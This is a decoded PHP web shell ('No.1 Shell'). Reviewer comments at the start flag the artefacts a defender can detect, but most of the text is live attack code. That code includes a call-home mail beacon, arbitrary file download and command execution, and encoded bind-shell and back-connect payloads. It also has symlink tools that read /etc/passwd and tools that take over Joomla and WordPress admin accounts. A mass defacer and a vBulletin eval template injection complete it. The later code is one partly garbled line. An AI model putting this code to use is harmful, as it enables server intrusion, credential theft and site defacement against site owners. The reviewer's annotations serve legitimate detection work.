/* Decoded by unphp.net */

// Reviewer annotations: this span is the preamble of a password-gated PHP web
// shell. The code is unchanged; the comments describe what the decoded text
// does and which artefacts a defender can key on (file signatures, request
// parameters, outbound mail, child processes).

// Access gate. Both literals are unsalted MD5 digests; the HTTP Basic user name
// and password are hashed with md5() and compared against them. Unsalted MD5
// gives the credentials no real protection, and the two literals are stable
// strings for file-content scanning of web roots.
$name = '21232f297a57a5a743894a0e4a801fc3';
$pass = 'b092adad4fbc63777eb59bc8feca962a';
if(!isset($_SERVER['PHP_AUTH_USER']) ||md5($_SERVER['PHP_AUTH_USER']) !== $name ||md5($_SERVER['PHP_AUTH_PW']) !== $pass) {
    // Unauthenticated requests receive a 401 challenge with realm "Password"
    // and the body 'Error password' -- a response fingerprint that shows up in
    // proxy and WAF logs.
    header('WWW-Authenticate: Basic realm="Password"');
    header('HTTP/1.0 401 Unauthorized');
    exit('Error password');
}

// Call-home beacon: every request that passes the gate mails a hard-coded
// mailbox the server's resolved IP, the Host header, the request URI, the
// client IP and a timestamp. The '@' suppresses any mail() warning. Mail sent
// by the web-server account with a 'shell@<ip>' sender is a strong signal in
// MTA logs.
$time_shell = "".date("d/m/Y - H:i:s") ."";
$ip_remote = $_SERVER["REMOTE_ADDR"];
$from_shellcode = 'shell@'.gethostbyname($_SERVER['SERVER_NAME']) .'';
$to_email = 'blog24h@gmail.com';
$server_mail = "".gethostbyname($_SERVER['SERVER_NAME']) ." - ".$_SERVER['HTTP_HOST'] ."";
$linkcr = "Link: ".$_SERVER['SERVER_NAME'] ."".$_SERVER['REQUEST_URI'] ." - IP Excuting: $ip_remote - Time: $time_shell";
// NOTE(review): as decoded, the From and Reply-to fields are separated by a
// space rather than a line break -- possibly lost in decoding; confirm against
// the raw sample.
$header = "From: $from_shellcode Reply-to: $from_shellcode";
@mail($to_email,$server_mail,$linkcr,$header);;

// Removes the execution time limit and turns off error reporting for the rest
// of the request, so failures leave nothing in the PHP error log.
set_time_limit(0);
error_reporting(0);

// File exfiltration handlers. The value of the 'dl' (raw) or 'dlgzip'
// (gzip-compressed) query parameter is passed unvalidated to
// file_get_contents() and the result is returned as an attachment, then the
// script exits. Access-log entries carrying these parameter names with a
// filesystem path are worth alerting on.
if(isset($_GET["dl"]) &&($_GET["dl"] != "")){
    $file = $_GET["dl"];
    $filez = @file_get_contents($file);
    header("Content-type: application/octet-stream");
    header("Content-length: ".strlen($filez));
    header("Content-disposition: attachment;filename=".basename($file).";");
    echo $filez;
    exit;
} elseif(isset($_GET["dlgzip"]) &&($_GET["dlgzip"] != "")){
    $file = $_GET['dlgzip'];
    $filez = gzencode(@file_get_contents($file));
    header("Content-Type:application/x-gzip ");
    header("Content-length: ".strlen($filez));
    header("Content-disposition: attachment;filename=".basename($file).".gz;");
    echo $filez;
    exit;
}

// Image passthrough: concatenates the 'y' and 'img' query parameters and
// streams that path with readfile(), using the MIME type getimagesize()
// reports. magicboom() is defined later in this file and applies
// stripslashes() when magic quotes are on.
if(isset($_GET["img"])){
    @ob_clean();
    $d = magicboom($_GET["y"]);
    $f = $_GET["img"];
    $inf = @getimagesize($d.$f);
    $ext = explode($f,".");
    $ext = $ext[count($ext)-1];
    @header("Content-type: ".$inf["mime"]);
    @header("Cache-control: public");
    @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
    @header("Cache-control: max-age=".(60*60*24*7));
    @readfile($d.$f);
    exit;
}

// Host fingerprinting: server software string, whether safe_mode is reported
// enabled, and whether php_uname() starts with "win".
$software = getenv("SERVER_SOFTWARE");
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
else $safemode = FALSE;
$system = @php_uname();
if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
else $win = FALSE;

// Working directory is taken straight from the request: 'view' when it names
// a directory, otherwise 'y'.
if(isset($_GET['y'])){
    if(@is_dir($_GET['view'])){
        $pwd = $_GET['view'];
        @chdir($pwd);
    }else{
        $pwd = $_GET['y'];
        @chdir($pwd);
    }
}

// On non-Windows hosts the shell runs `whoami` and `id` through exe(), which
// is defined later in this file and tries system(), exec(), passthru() and
// shell_exec() in that order; rapih() (also defined later) trims the output.
// Two things follow for defenders: the web-server account spawning
// whoami/id is a high-fidelity process-creation detection, and listing those
// four functions in php.ini disable_functions removes this command path.
if(!$win){
    if(!$user = rapih(exe("whoami")))$user = "";
    if(!$id = rapih(exe("id"))) $id = "";
    $prompt = $user." \$ ";
    $pwd = @getcwd().DIRECTORY_SEPARATOR;
} else {
    $user = @get_current_user();
    $id = $user;
    $prompt = $user." >";
    // NOTE(review): from here to the end of this span the text is left exactly
    // as decoded and on one line. The backslash string literals have lost a
    // character and the for-loop header is truncated, so quote pairing cannot
    // be trusted and the text does not parse as shown. What it visibly
    // contains, in order: the rest of the Windows branch (probes drive letters
    // A-Z with is_dir()); a check for the posix_getpwuid/posix_getgrgid
    // functions; the server and client IPs; hard-coded $bindport /
    // $bindport_pass values (their use is not visible in this span --
    // presumably tied to the encoded $port_bind_* payloads later in the file,
    // confirm); the path breadcrumb; and three POST handlers ('rename',
    // 'chmod', 'chmod_folder') that call rename()/chmod() on $pwd plus
    // request-supplied names with no validation. It ends by starting the
    // $buff status banner.
    $pwd = realpath(".")."\";$v = explode("\",$d);$v = $v[0];foreach (range("A","Z") as $letter) {$bool = @is_dir($letter.":\");if ($bool){$letters .= "[ ";if ($letter.":"!= $v){$letters .= $letter;}else {$letters .= "".$letter."";}$letters .= " ] ";}}} if(function_exists("posix_getpwuid") &&function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE;$server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);$my_ip = $_SERVER['REMOTE_ADDR'];$bindport = "13123";$bindport_pass = "k2ll33d";$pwds = explode(DIRECTORY_SEPARATOR,$pwd);$pwdurl = "";for($i = 0 ;$i ".$pwds[$i]." ".DIRECTORY_SEPARATOR." ";} if(isset($_POST['rename'])){$old = $_POST['oldname'];$new = $_POST['newname'];@rename($pwd.$old,$pwd.$new);$file = $pwd.$new;}if(isset($_POST['chmod'])){ $name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 ."".$value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;} if(isset($_POST['chmod_folder'])){$name = $_POST['name'];$value = $_POST['newvalue'];if (strlen($value)==3){$value = 0 ."".$value;}@chmod($pwd.$name,octdec($value));$file = $pwd.$name;}$buff = " ".$software."
";$buff .= " ".$system."
";if($id != "") $buff .= " ".$id."
";if($safemode) $buff .= " safemode : ON
";else $buff .= " safemode : OFF
"; function showstat($stat) {if ($stat=="on") {return "ON";}else {return "OFF";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} $buff .= " MySQL: ".testmysql()." | Perl: ".testperl()." | cURL: ".testcurl()." | WGet: ".testwget()."
"; $buff .= " ".$letters." > ".$pwdurl; function rapih($text){return trim(str_replace("
","",$text));} function magicboom($text){if (!get_magic_quotes_gpc()){return $text;}return stripslashes($text);} function showdir($pwd,$prompt){$fname = array();$dname = array(); if(function_exists("posix_getpwuid") &&function_exists("posix_getgrgid")) $posix = TRUE;else $posix = FALSE;$user = "????:????"; if($dh = opendir($pwd)){while($file = readdir($dh)){ if(is_dir($file)){$dname[] = $file;} elseif(is_file($file)){$fname[] = $file;}}closedir($dh);}sort($fname);sort($dname);$path = @explode(DIRECTORY_SEPARATOR,$pwd);$tree = @sizeof($path);$parent = ""; $buff = "
$prompt
view file/folder
"; if($tree >2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win &&$posix){$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder));$owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= " ";} elseif($folder == ".."){ if(!$win &&$posix) {$name=@posix_getpwuid(@fileowner($folder));$group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= "";}else{if(!$win &&$posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= "";}} foreach($fname as $file){ $full = $pwd.$file; if(!$win &&$posix){$name=@posix_getpwuid(@fileowner($file));$group=@posix_getgrgid(@filegroup($file));$owner = $name['name']." : ".$group['name'];} else {$owner = $user;} $buff .= "";} $buff .= "
namesizeowner:grouppermsmodifiedactions
$folder- ".$owner."
".get_perms($pwd)."
".date("d-M-Y H:i",@filemtime($pwd))." newfile | newfolder
- ".$owner."
".get_perms($parent)."
".date("d-M-Y H:i",@filemtime($parent))." newfile | newfolder
$folder
DIR".$owner."
".get_perms($pwd.$folder)."
".date("d-M-Y H:i",@filemtime($folder))."rename| delete
$file
".ukuran($full)."".$owner."
".get_perms($full)."
".date("d-M-Y H:i",@filemtime($full))." edit | rename| delete | download (gz)
";return $buff;} function ukuran($file){if($size = @filesize($file)){if($size <= 1024) return $size;else{if($size <= 1024*1024) {$size = @round($size / 1024,2);; return "$size kb";}else {$size = @round($size / 1024 / 1024,2);return "$size mb";}}} else return "???";}function exe($cmd){if(function_exists('system')) {@ob_start();@system($cmd);$buff = @ob_get_contents();$buff = @ob_get_contents();@ob_end_clean(); return $buff;}elseif(function_exists('exec')) {@exec($cmd,$results);$buff = "";foreach($results as $result){$buff .= $result;}return $buff;} elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$buff = @ob_get_contents();@ob_end_clean();return $buff;} elseif(function_exists('shell_exec')){$buff = @shell_exec($cmd);return $buff;}}function tulis($file,$text){$textz = gzinflate(base64_decode($text));if($filez = @fopen($file,"w")) {@fputs($filez,$textz);@fclose($file);}} function ambil($link,$file) {if($fp = @fopen($link,"r")){while(!feof($fp)){$cont.= @fread($fp,1024);}@fclose($fp);$fp2 = @fopen($file,"w");@fwrite($fp2,$cont);@fclose($fp2);}} function which($pr){$path = exe("which $pr"); if(!empty($path)) {return trim($path);} else {return trim($pr);}} function download($cmd,$url){$namafile = basename($url); switch($cmd){case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break;case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break;case 'wfread': ambil($wurl,$namafile);break;case 'wfetch': exe(which('fetch')." -o ".$namafile." -p ".$url);break;case 'wlinks': exe(which('links')." -source ".$url." > ".$namafile);break;case 'wget': exe(which('GET')." ".$url." > ".$namafile);break;case 'wcurl': exe(which('curl')." ".$url." 
-o ".$namafile);break;default: break;} return $namafile;}function get_perms($file) {if($mode=@fileperms($file)){$perms='';$perms .= ($mode &00400) ?'r': '-';$perms .= ($mode &00200) ?'w': '-';$perms .= ($mode &00100) ?'x': '-';$perms .= ($mode &00040) ?'r': '-';$perms .= ($mode &00020) ?'w': '-';$perms .= ($mode &00010) ?'x': '-';$perms .= ($mode &00004) ?'r': '-';$perms .= ($mode &00002) ?'w': '-';$perms .= ($mode &00001) ?'x': '-'; return $perms;}else return "??????????";}function clearspace($text){return str_replace(" ","_",$text);}$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St 
ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";;echo 'No.1 Shell
  
';echo strtoupper((base64_decode('PGgyIGNsYXNzPSJ0aXRsZSI+Tm8uMSBTaGVsbDwvaDI+ICA=')));;echo '
';echo $buff;;echo 'server ip : ';echo $server_ip."

your ip : ".$my_ip."
";;echo '
H O M E


';if(isset($_GET['x']) &&($_GET['x'] == 'php')){;echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'about')){echo '



No.1 Shell

By No.1


Mail | Facebook | No.1


'.date('Y').'

';} elseif(isset($_GET['x']) &&($_GET['x'] == 'sf')) {@set_time_limit(0);@mkdir('sym',0777);error_reporting(0);$htaccess = "Options all DirectoryIndex gaza.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any";$op =@fopen ('sym/.htaccess','w');fwrite($op ,$htaccess);echo '



Symlinker


File Path:

Symlink Name




';$target = $_POST['file'];$symfile = $_POST['symfile'];$symlink = $_POST['symlink'];if ($symlink) {@symlink("$target","sym/$symfile");echo '
'.$symfile.'



';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'js')) {if ($_POST['symjo']) {$config = file_get_contents($_POST['url']);$user = $_POST['user'];$pass = md5($_POST['pass']);function ex($text,$a,$b){$explode = explode($a,$text);$explode = explode($b,$explode[1]);return $explode[0];}if($config &&ereg('JConfig',$config)){$psswd = ex($config,'$password = \'',"';");$username = ex($config,'$user = \'',"';");$dbname = ex($config,'$db = \'',"';");$prefix = ex($config,'$dbprefix = \'',"';");$host = ex($config,'$host = \'',"';");$email = ex($config,'$mailfrom = \'',"';");$formn = ex($config,'$fromname = \'',"';");$conn = mysql_connect($host,$username,$psswd) or die(mysql_error());mysql_select_db($dbname,$conn) or die($username.' '.$psswd.' '.$host.' '.$dbname);$query = @mysql_query("UPDATE `".$prefix."users` SET `username` ='".$user."' , `password` = '".$pass."', `usertype` = 'Super Administrator', `block` = 0");if ($query) {echo '

Done !


site nameuserpasswordemail
'.$formn.''.$user.''.$_POST["pass"].''.$email.'
';}else {echo '

ERROR !

';}}else die('

Not a joomla config

');}else {;echo '


Joomla login changer ( symlink version )


config link :
new user :
new password :

';}} elseif(isset($_GET['x']) &&($_GET['x'] == 'sec')){$d0mains = @file("/etc/named.conf"); if($d0mains){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#',$d0main,$domains);flush();if(strlen(trim($domains[1][0])) >2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "";flush();$dcount++;}}}echo "
S. No.DomainsUsersSymlink
".$dcount ."".$domains[1][0]."".$user['name']."Symlink
";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

";$dcount = 1;$file = fopen("/etc/passwd","r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s',$s,$matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) >12 ||strlen($matches) == 0 ||$matches == "bin"||$matches == "etc/X11/fs"||$matches == "var/lib/nfs"||$matches == "var/arpwatch"||$matches == "var/gopher"||$matches == "sbin"||$matches == "var/adm"||$matches == "usr/games"||$matches == "var/ftp"||$matches == "etc/ntp"||$matches == "var/www"||$matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
S. No.UsersSymlink
".$dcount ."".$matches ."Symlink
";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "

server symlinker

";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)." ";}echo '
';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt","r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s',$s,$matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) >12 ||strlen($matches) == 0 ||$matches == "bin"||$matches == "etc/X11/fs"||$matches == "var/lib/nfs"||$matches == "var/arpwatch"||$matches == "var/gopher"||$matches == "sbin"||$matches == "var/adm"||$matches == "usr/games"||$matches == "var/ftp"||$matches == "etc/ntp"||$matches == "var/www"||$matches == "var/named")continue;echo "";echo "";$dcount++;}fclose($file);echo "
idUsersSymlink
".$dcount ."".$matches ."Symlink
";unlink("test.txt");}else echo "
Cannot create Symlink
";}}} elseif(isset($_GET['x']) &&($_GET['x'] == 'mass')){error_reporting(0);;echo '


Folder Mass Defacer


Folder :

File Name :

index URL :

';@error_reporting(0);$mainpath=$_POST[path];$file=$_POST[file];$indexurl=$_POST[url];echo "
";$dir=opendir("$mainpath");while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$code=@file_get_contents($indexurl);$finish=@fwrite($start,$code);if ($finish){echo "» $row/$file » Done

";}}} elseif(isset($_GET['x']) &&($_GET['x'] == 'vb')) {if(empty($_POST['index'])){echo "



Vbulletin index changer


host :  | database :  | username :  | password :  | perfix :


";}else{$localhost = $_POST['localhost'];$database = $_POST['database'];$username = $_POST['username'];$password = $_POST['password'];$perfix = $_POST['perfix'];$index = $_POST['index'];@mysql_connect($localhost,$username,$password) or die(mysql_error());@mysql_select_db($database) or die(mysql_error());$index=str_replace("\'","'",$index);$set_index = "{\${eval(base64_decode(\'";$set_index .= base64_encode("echo '$index';");$set_index .= "\'))}}{\${exit()}}";$ok=@mysql_query("UPDATE ".$perfix."template SET template ='".$set_index."' WHERE title ='FORUMHOME'") or die(mysql_error());if($ok){echo "Defaced

";}}} elseif(isset($_GET['x']) &&($_GET['x'] == 'boom')){error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien,$text);$ar1=explode($marqueurFinLien,$ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() %33;$tmp = substr($chars,$num,1);$pass = $pass .$tmp;$i++;}return $pass;}function index_changer_wp($conf,$content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = 'b092adad4fbc63777eb59bc8feca962a' WHERE `ID` = 1");}else {$output.= "[-] DB Error
";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error
";}else {$output.= "[+] Login Successful
";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'');$_file = entre2v2($buffer0,'');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'
');if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Updated Successfuly
";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}}else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,0);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'');$_file = entre2v2($buffer0,'');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor
";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_POST,1);curl_setopt($ch,CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,"COOKIE.txt");curl_setopt($ch,CURLOPT_COOKIEFILE,"COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'
');if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Template Updated Successfuly
";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}}else {$output.= "[-] index.php can not load in Theme Editor
";}}}}else {$output.= "[-] DB Error
";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond,'output'=>$output);}function index_changer_joomla($conf,$content,$domain) {$doler = '$';$username = entre2v2($conf,$doler."user = '","';");$password = entre2v2($conf,$doler."password = '","';");$dbname = entre2v2($conf,$doler."db = '","';");$prefix = entre2v2($conf,$doler."dbprefix = '","';");$host = entre2v2($conf,$doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0;$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));}else {$output.= "[-] DB Error
";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch,CURLOPT_URL,$url2);curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_HEADER,0);curl_setopt($ch,CURLOPT_USERAGENT,$useragent);curl_setopt($ch,CURLOPT_COOKIEJAR,$co);curl_setopt($ch,CURLOPT_COOKIEFILE,$co);$buffer = curl_exec($ch);$return = entre2v2($buffer ,'');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error
";}else {$output.= "[+] Index.php Template successfully saved
